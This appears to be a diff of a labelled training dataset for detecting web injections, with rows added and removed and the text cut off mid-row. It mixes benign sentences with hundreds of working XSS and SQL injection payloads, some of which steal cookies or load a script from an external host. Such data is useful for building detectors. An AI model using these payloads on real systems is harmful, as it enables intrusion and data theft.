+They must select quickly.,0,normal,24271 +<u onpointermove=alert(1)>XSS</u>,1,XSS,4133 +The RFID chip in the key fob contains a select set of codes designed to work with a given car.,0,normal,25348 +"1%"" ) ) ) union all select null,null,null,null,null,null,null--",2,SQLi,17113 +WHERE 1=1 AND 1=1--,2,SQLi,10135 +"select * from users where id = 1 +$ . union select null,@@VERSION -- 1",2,SQLi,11496 +"“I do think that being able to select different people could help,” she said.",0,normal,26399 +foreign,0,normal,23143 +Where's your SQL aid?,0,normal,23377 +if ( 3593 = 3779 ) select 3593 else drop function qtqy--,2,SQLi,16498 +"1' ) ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( 'xdui' like 'xdui",2,SQLi,12830 +"1"" ) ) as wfne where 8933 = 8933",2,SQLi,21040 +"1"" and elt ( 8464 = 5761,5761 ) and ""ydmt"" like ""ydmt",2,SQLi,12845 +"1' in boolean mode ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,20669 +Select the best ingredients for baking.,0,normal,24211 +Let him select a route for you and then suggest an alternate route.,0,normal,25867 +<title id=x tabindex=1 onbeforeactivate=alert(1)></title>,1,XSS,3190 +"<div draggable=""true"" contenteditable>drag me</div><dt ondragover=alert(1) contenteditable>drop here</dt>",1,XSS,4105 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( 'pags' = 'pags,2,SQLi,21274 +"`'><script>-javascript:alert(1)</script> +`'><script>\x00javascript:alert(1)</script>",1,XSS,9505 +1' ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( 'zqiw' = 'zqiw,2,SQLi,14625 +Select a fragrance for relaxation.,0,normal,23965 +"select * from users where id = 1 or "" ( @"" or 1 = 1 -- 1",2,SQLi,11504 +"But if you're buying flowers online, all you need to do is select an occasion, look at some pictures, then select a type, number of flowers, a vase and write a personal message.",0,normal,26267 +"<;DIV STYLE="";background-image: url(&;#1;javascript:alert(';XSS';))"";>;",1,XSS,1524 +"<dt draggable=""true"" ondragstart=""alert(1)"">test</dt>",1,XSS,3044 +"admin"") or ""1""=""1""/*",2,SQLi,9905 +<tt id=x tabindex=1 onfocus=alert(1)></tt>,1,XSS,4060 +-7293' ) ) ) or 3038 = 3038,2,SQLi,13539 +"1' ) ) ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,18163 +"<label draggable=""true"" ondrag=""alert(1)"">test</label>",1,XSS,4511 +-5089' ) ) as icbb where 1129 = 1129 or 6250 = 9650,2,SQLi,22407 +"iif ( 7011 = 2522,1,1/0 )",2,SQLi,16566 +"1' and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and 'ukxj' = 'ukxj",2,SQLi,20832 +Find records where relevant.,0,normal,23421 +<animatemotion onpointerup=alert(1)>XSS</animatemotion>,1,XSS,3070 +waitfor delay '0:0:5' and ( ( 'yjsp' like 'yjsp,2,SQLi,16436 +"1 and elt ( 4249 = 4249,7259 ) # lwyo",2,SQLi,16757 +Select your authenticate.,0,normal,24964 +"<div draggable=""true"" contenteditable>drag me</div><iframe ondragover=alert(1) contenteditable>drop here</iframe>",1,XSS,3478 +"<style>:target {transform: rotate(180deg);}</style><link id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></link>",1,XSS,8830 +<time id=x tabindex=1 onfocusin=alert(1)></time>,1,XSS,2871 +"<svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script",1,XSS,1211 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><textarea id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></textarea>",1,XSS,2481 +<menuitem onpointerup=alert(1)>XSS</menuitem>,1,XSS,4425 +"-5672' ) ) union all select 9371,9371,9371,9371,9371,9371--",2,SQLi,20852 +"1 ) ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,13910 +"1' ) ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( 'bzak' like 'bzak",2,SQLi,16226 +"exp/*<A STYLE='no\xss:noxss(""*//*"");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(""XSS""))'>",1,XSS,1067 +<q onpointermove=alert(1)>XSS</q>,1,XSS,5474 +"<link onclick=""alert(1)"">test</link>",1,XSS,6688 +"1"" ) ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( ( ""sdps"" = ""sdps",2,SQLi,15256 +"xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\""XSS\""))'&gt;",1,XSS,963 +there was an attempt to select something,0,normal,25294 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) and '%' = ',2,SQLi,20727 +"<style>@keyframes slidein {}</style><shadow style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></shadow>",1,XSS,1723 +"<iframe onReadyStateChange iframe onReadyStateChange=""javascript:javascript:alert(1)""></iframe onReadyStateChange>",1,XSS,368 +"SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|""XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR""*/ FROM some_table WHERE ex = ample",2,SQLi,22467 +-9024 ) where 1686 = 1686 or 3069 = 8213--,2,SQLi,15954 +"1' and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and 'ulep' = 'ulep",2,SQLi,12526 +-- &password =,2,SQLi,11592 +<svg><summary onload=alert(1)></summary>,1,XSS,4357 +"-5082 ) ) union all select 4013,4013,4013,4013,4013,4013,4013,4013,4013,4013#",2,SQLi,21208 +"<progress onmousedown=""alert(1)"">test</progress>",1,XSS,2679 +select ( case when ( 8916 = 1357 ) then 8916 else 8916* ( select 8916 from information_schema.character_sets ) end ) #,2,SQLi,17929 +"-9256"" ) ) union all select 2977,2977,2977,2977,2977,2977,2977--",2,SQLi,19883 +"The mayor holds office for three years, has the powers and jurisdiction of a justice of the peace, appoints the heads of departments (public safety, public works, collector of delinquent taxes, assessors, city treasurer, law, charities and correction, and sinking fund commission), and may remove any of the officers he has appointed, by a written order, showing cause, to the select council.",0,normal,25375 +"1"" where 8978 = 8978 union all select null,null,null,null,null,null,null,null--",2,SQLi,21659 +"select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ""%"" = """,2,SQLi,21893 +"1"" ) as ssbz where 8885 = 8885 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,13671 +"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ""layz"" = ""layz",2,SQLi,19799 +"<input draggable=""true"" ondragleave=""alert(1)"">test</input>",1,XSS,5212 +Select your ask.,0,normal,24931 +1 ) where 7159 = 7159,2,SQLi,13934 +"<style>@keyframes x{}</style><u style=""animation-name:x"" onanimationstart=""alert(1)""></u>",1,XSS,7559 +1' where 4795 = 4795 and 4595 = 4595#,2,SQLi,12399 +"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i",2,SQLi,11022 +"<applet onpaste=""alert(1)"" contenteditable>test</applet>",1,XSS,3980 +<font onfocusout=alert(1) tabindex=1 id=x></font><input autofocus>,1,XSS,4672 +<content onpointermove=alert(1)>XSS</content>,1,XSS,8371 +"1' ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )",2,SQLi,16883 +Where's the beach?,0,normal,23481 +"admin"" or 1 = 1",2,SQLi,11451 +"<link ondblclick=""alert(1)"">test</link>",1,XSS,3506 +David Seaburg was a buyer of the Energy Select Sector SPDR.,0,normal,26203 +"-7107"" ) ) ) order by 1#",2,SQLi,20838 +"1%' union all select null,null,null,null#",2,SQLi,19520 +1%' and 4595 = 4595#,2,SQLi,12073 +"1"" and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ""jcgh"" = ""jcgh",2,SQLi,20248 +1 ) as afxc where 7497 = 7497,2,SQLi,19096 +"1'+ ( select zukr where 9215 = 9215 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) ) +'",2,SQLi,16051 +"1%' ) ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ( '%' = '",2,SQLi,12168 +Select voyage.,0,normal,24616 +"select * from users where id = 1 or $<\. union select 1,@@VERSION -- 1",2,SQLi,11636 +1'+ ( select zpdf where 2938 = 2938,2,SQLi,14808 +"1"" ) as ebvt where 5305 = 5305",2,SQLi,19835 +<rp onpointerover=alert(1)>XSS</rp>,1,XSS,3530 +"<style>:target {color:red;}</style><i id=x style=""transition:color 1s"" ontransitionend=alert(1)></i>",1,XSS,7498 +"ABC<div style=""x:\xE2\x80\x80expression(javascript:alert(1)"">DEF",1,XSS,451 +<label onpointerenter=alert(1)>XSS</label>,1,XSS,8589 +<dfn id=x tabindex=1 onfocus=alert(1)></dfn>,1,XSS,2648 +"<style>:target {color: red;}</style><menu id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></menu>",1,XSS,6112 +"1' ) and make_set ( 8403 = 8403,8899 ) and ( 'dhoo' like 'dhoo",2,SQLi,16842 +"<del draggable=""true"" ondragleave=""alert(1)"">test</del>",1,XSS,5946 +<dir onpointerout=alert(1)>XSS</dir>,1,XSS,8269 +"1"" ) ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,14763 +"1%' and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and '%' = '",2,SQLi,17220 +"1%' or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and '%' = '",2,SQLi,16832 +Sort the cards.,0,normal,22774 +She'll select the cake.,0,normal,24226 +1' ) as hqaq where 6411 = 6411 and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,22153 +"1', ( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select 1 from generate_series ( 8979,8979,case when ( 8979 = 8979 ) then 1 else 0 end ) limit 1 ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) )",2,SQLi,14657 +<head onpointerup=alert(1)>XSS</head>,1,XSS,3210 +<strong onpointerdown=alert(1)>XSS</strong>,1,XSS,6587 +"-2359' union all select 2687,2687,2687#",2,SQLi,18165 +"1%' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and '%' = '",2,SQLi,18883 +"<iframe src=""javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'""></iframe>",1,XSS,200 +"select * from users where id = 1 or @#""{ = 1 or 1 = 1 -- 1",2,SQLi,11961 +"1%' ) ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( ( '%' = '",2,SQLi,19972 +"<style>@keyframes x{}</style><a style=""animation-name:x"" onanimationstart=""alert(1)""></a>",1,XSS,7304 +"1' ) ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,21481 +"<style>@keyframes slidein {}</style><span style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></span>",1,XSS,3464 +"<samp onmousemove=""alert(1)"">test</samp>",1,XSS,1806 +"1' in boolean mode ) union all select null,null--",2,SQLi,13355 +<figcaption onpointerenter=alert(1)>XSS</figcaption>,1,XSS,7604 +select ( case when ( 6615 = 3564 ) then 1 else 6615* ( select 6615 from master..sysdatabases ) end ) --,2,SQLi,12334 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frame id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></frame>",1,XSS,8122 +-3499' ) ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( 'nzap' like 'nzap,2,SQLi,19365 +"1 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) )",2,SQLi,19045 +"<isindex oncopy=""alert(1)"" contenteditable>test</isindex>",1,XSS,8011 +"1%' ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( '%' = '",2,SQLi,20207 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--",2,SQLi,10549 +Select refresh.,0,normal,24592 +"The speaker, instead of deciding the question, submitted it to the judgment of the House, and it was ultimately referred to a select committee, which reported against Bradlaughs claim.",0,normal,25336 +"1'+ ( select qymy where 8657 = 8657 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,20779 +"<big onbeforecopy=""alert(1)"" contenteditable>test</big>",1,XSS,4155 +"<basefont onmouseover=""alert(1)"">test</basefont>",1,XSS,5504 +Select a fitness class to stay active.,0,normal,24189 "<xss onkeypress=""alert(1)"" contenteditable style=display:block>test</xss>",1,XSS,73 -<strike onpointerout=alert(1)>XSS</strike>,1,XSS,6434 -<ul onfocusout=alert(1) tabindex=1 id=x></ul><input autofocus>,1,XSS,6651 -"<style>@keyframes slidein {}</style><input style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></input>",1,XSS,7008 -pg_SLEEP(5),2,SQLi,10421 -1%' ) ) ) or sleep ( 5 ) #,2,SQLi,21006 -"<object data=""data:text/html;base64,%(base64)s"">",1,XSS,593 -"1' ) where 8255 = 8255 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,15491 -"<h1 onmouseleave=""alert(1)"">test</h1>",1,XSS,3596 -"1"" ) ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( ""jmjr"" like ""jmjr",2,SQLi,19581 -1 ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( 6518 = 6518,2,SQLi,21276 -1 where 2382 = 2382,2,SQLi,14341 -"{""id"":null,""firstName"":""Lotus"",""lastName"":""Li"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25519 -"1"" ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ""vnso"" like ""vnso",2,SQLi,14930 -"<optgroup onmouseout=""alert(1)"">test</optgroup>",1,XSS,3249 -"1"" where 8379 = 8379 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13328 -"1' ) ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( 'bzak' like 'bzak",2,SQLi,16403 -1 ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,21097 -select * from users where id = 1 <@.. or 1 = 1 -- 1,2,SQLi,12082 -Where did you learn about that ancient artifact from?,0,normal,23997 -Select modify.,0,normal,24794 -"1%"" ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ""%"" = """,2,SQLi,18044 -1 where 1636 = 1636 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,17634 -"1%"" ) ) rlike ( select ( case when ( 4207 = 1757 ) then 1 else 0x28 end ) ) and ( ( ""%"" = """,2,SQLi,20180 --3359' order by 1--,2,SQLi,15261 -<th onpointerover=alert(1)>XSS</th>,1,XSS,6075 -"<main onmouseenter=""alert(1)"">test</main>",1,XSS,5298 -"{""id"":8430,""firstName"":""jmeter"",""lastName"":""use in jmeter test <DO NOT DELETE>"",""specialties"":[{""id"":1,""name"":""Infantry1001""},{""id"":2,""name"":""Air Defense Artillery""},{""id"":24,""name"":""Engineer""}]}",0,normal,25299 -""" waitfor delay '0:0:20' --",2,SQLi,10971 -"-7272"" ) union all select 9163,9163,9163,9163,9163,9163,9163--",2,SQLi,13013 -"1', ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4250 = 4250 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual )",2,SQLi,15758 --1641' ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( 'vgcb' like 'vgcb,2,SQLi,17286 -Join us tonight for a fantastic dinner.,0,normal,23093 -pg_sleep(5)--,2,SQLi,10401 -1 where 3502 = 3502 order by 1--,2,SQLi,16018 -Select sell.,0,normal,24952 -<shadow id=x tabindex=1 onbeforedeactivate=alert(1)></shadow><input autofocus>,1,XSS,8083 -"1 ) ) as qfnu where 1609 = 1609 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,20403 -<col id=x tabindex=1 onfocusin=alert(1)></col>,1,XSS,4603 -onMouseOver,1,XSS,9683 -select ( case when ( 4061 = 1396 ) then 4061 else 1/ ( select 0 ) end ) --,2,SQLi,13478 -"1%"" ) ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ( ""%"" = """,2,SQLi,18280 -"select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( '%' = '",2,SQLi,21465 -1' ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( ( 'jrpk' = 'jrpk,2,SQLi,12645 -<li id=x tabindex=1 onfocusin=alert(1)></li>,1,XSS,6648 -"1"" and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,14238 -"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> -%0ajavascript:`/*\/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover=""/**/ alert(test)//'"">`",1,XSS,9602 -"<video onpaste=""alert(1)"" contenteditable>test</video>",1,XSS,3223 -"<div draggable=""true"" contenteditable>drag me</div><caption ondragover=alert(1) contenteditable>drop here</caption>",1,XSS,8171 -Select dim.,0,normal,24863 -"""),NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10910 -"1' ) as wnyl where 8978 = 8978 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,14227 -"<dir ondblclick=""alert(1)"">test</dir>",1,XSS,6085 -"1' ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( 'fdoc' like 'fdoc",2,SQLi,20460 -Select wilt.,0,normal,24858 -<html id=x tabindex=1 onbeforeactivate=alert(1)></html>,1,XSS,4548 -"<fieldset onmouseup=""alert(1)"">test</fieldset>",1,XSS,7468 -"1' and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and 'tmwy' = 'tmwy",2,SQLi,13201 -"select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( ( 'squj' = 'squj",2,SQLi,20483 -admin' ) or '1' = '1'--,2,SQLi,11620 -"1"" ) ) as azak where 4911 = 4911",2,SQLi,15463 -"<video><track default onload=alert(1) src=""data:text/vtt,WEBVTT""></video>",1,XSS,8011 -tz_offset,2,SQLi,10135 -<IMG SRC=&{javascript:alert(1);};>,1,XSS,747 -"1%"" union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,22178 -"1%"" ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ""%"" = """,2,SQLi,20631 -Select acquire.,0,normal,24741 -I'll select my dress.,0,normal,24525 -<svg><rb onload=alert(1)></rb>,1,XSS,7161 -<summary onpointerenter=alert(1)>XSS</summary>,1,XSS,2843 -</title><SCRIPT>document.vulnerable=true;</script>,1,XSS,1431 -"UNION select table_schema,table_name FROM information_Schema.tables;#",2,SQLi,10071 -"elt ( 2427 = 2427,5518 )",2,SQLi,19135 -"1' ) ) as sojl where 8710 = 8710 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,17506 -"1"" order by 1--",2,SQLi,17985 -1'|| ( select 'jjpy' from dual where 6295 = 6295,2,SQLi,18940 -1' or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and 'hokd' = 'hokd,2,SQLi,14912 --8359 ) where 4430 = 4430 or 6872 = 6872--,2,SQLi,22404 -1 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ),2,SQLi,16100 -"1%"" ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ""%"" = """,2,SQLi,12390 -"javascript:""/*'/*\""/*` /**/alert()//--></title></textarea></style></noscript></noembed></template></script><script>alert()</script><svg/<frame/onload=alert()>",1,XSS,9540 -"<script ""a='>'"" SRC=""http://www.securitycompass.com/xss.js""></script>",1,XSS,1505 -"-2964"" ) ) order by 1--",2,SQLi,16266 -"1' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and 'qdij' = 'qdij",2,SQLi,19973 -"<i onmousemove=""alert(1)"">test</i>",1,XSS,2596 -<ruby id=x tabindex=1 onfocusin=alert(1)></ruby>,1,XSS,6254 -"1"" ) as qwyt where 4236 = 4236 union all select null,null,null,null,null--",2,SQLi,18231 -onBeforeCopy,1,XSS,9627 -Select the right route for your journey.,0,normal,24406 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10",2,SQLi,10457 -"<table onmouseup=""alert(1)"">test</table>",1,XSS,6837 -<isindex onblur=alert(1) tabindex=1 id=x></isindex><input autofocus>,1,XSS,5319 -1' ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( 'uqfs' = 'uqfs,2,SQLi,15697 -Select the right colors for the artwork.,0,normal,24370 -1' ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( 'rgyc' = 'rgyc,2,SQLi,19812 -select sleep ( 5 ) -- hlgt,2,SQLi,13738 -<sub onpointerleave=alert(1)>XSS</sub>,1,XSS,7692 -1' ) ) ) and 7533 = 7533 and ( ( ( 'txex' = 'txex,2,SQLi,20780 -Select a book for your imagination.,0,normal,24356 -"1%"" ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ""%"" = """,2,SQLi,20908 -"1' ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( 'mttj' like 'mttj",2,SQLi,19457 -"1"" and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ""uvvy"" like ""uvvy",2,SQLi,17259 -"javascript:alert()//</title></style></textarea></noscript></template></noembed><script>alert()</script>-->\"";alert()//"";alert()//';alert()//<script>alert()</script><frame src=""javascript:alert()"">` alert()//<svg/onload=alert()>*/alert()/*",1,XSS,9562 -"-6214"" union all select 3323,3323#",2,SQLi,14428 -"1"" and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ""eslo"" like ""eslo",2,SQLi,16049 -"-5182"" ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,20388 -") or (1""=""1""#",2,SQLi,10046 -select ( case when ( 8331 = 5625 ) then 8331 else 8331* ( select 8331 from mysql.db ) end ) #,2,SQLi,12984 -"-2375 union all select 1573,1573,1573,1573#",2,SQLi,13936 -"-1915%"" ) ) union all select 7732,7732,7732,7732,7732,7732,7732,7732,7732#",2,SQLi,18373 -<br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>,1,XSS,9071 -"{""id"":null,""firstName"":""Sean"",""lastName"":""Choo"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25832 -"<style>:target {color: red;}</style><head id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></head>",1,XSS,7222 -if ( 8727 = 4039 ) select 8727 else drop function giql--,2,SQLi,20557 -"1, ( select ( case when ( 1609 = 1609 ) then waitfor delay '0:0:5' else 1609* ( select 1609 from master..sysdatabases ) end ) )",2,SQLi,14606 -"select * from users where id = 1 or 1#""@ union select version ( ) ,version ( ) -- 1",2,SQLi,12068 -union,0,normal,23310 -"<style>@keyframes x{}</style><menu style=""animation-name:x"" onanimationend=""alert(1)""></menu>",1,XSS,8194 -"<html oncut=""alert(1)"" contenteditable>test</html>",1,XSS,4619 -“><<script>alert(document.cookie);//<</script>,1,XSS,1091 -"1'+ ( select jxgx where 7446 = 7446 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) 